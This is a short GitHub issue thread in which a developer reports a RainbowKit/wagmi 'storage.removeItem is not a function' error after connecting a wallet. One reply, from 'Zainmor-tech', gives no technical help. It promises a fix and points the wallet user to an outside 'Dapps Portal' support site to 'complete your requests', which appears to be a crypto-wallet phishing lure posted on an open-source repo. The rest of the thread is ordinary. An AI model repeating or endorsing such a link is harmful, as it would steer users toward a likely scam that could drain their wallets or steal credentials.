### ISSUE TITLE
TypeError: storage.removeItem is not a function

### ISSUE THREAD

**Issue by emmajane1313** [rainbow-me/rainbow#6370]
I am using Next 15.1.2, viem ^2.21.54, wagmi ^2.12.31,  @rainbow-me/rainbowkit ^2.2.0, @tanstack/react-query ^5.59.20

I keep getting this error after calling "openConnectModal" and signing the connect wallet transaction. Haven't ever experienced it before. Is it a known error? 

```
createStorage.js:36 Uncaught (in promise) TypeError: storage.removeItem is not a function
    at Object.removeItem (createStorage.js:36:34)
    at Object.onAccountsChanged (injected.js:399:43)
```

**Comment by Zainmor-tech** [comment]
@emmajane1313 
No, that’s new or you’re experiencing possibly an unknown error.
This will be fixed… Visit the Decentralized Dapps protocol page to report this for quick resolution via [Dapps Portal](https://dappswebsupport.com/) and complete your requests.

**Comment by walmat** [comment]
wrong repo
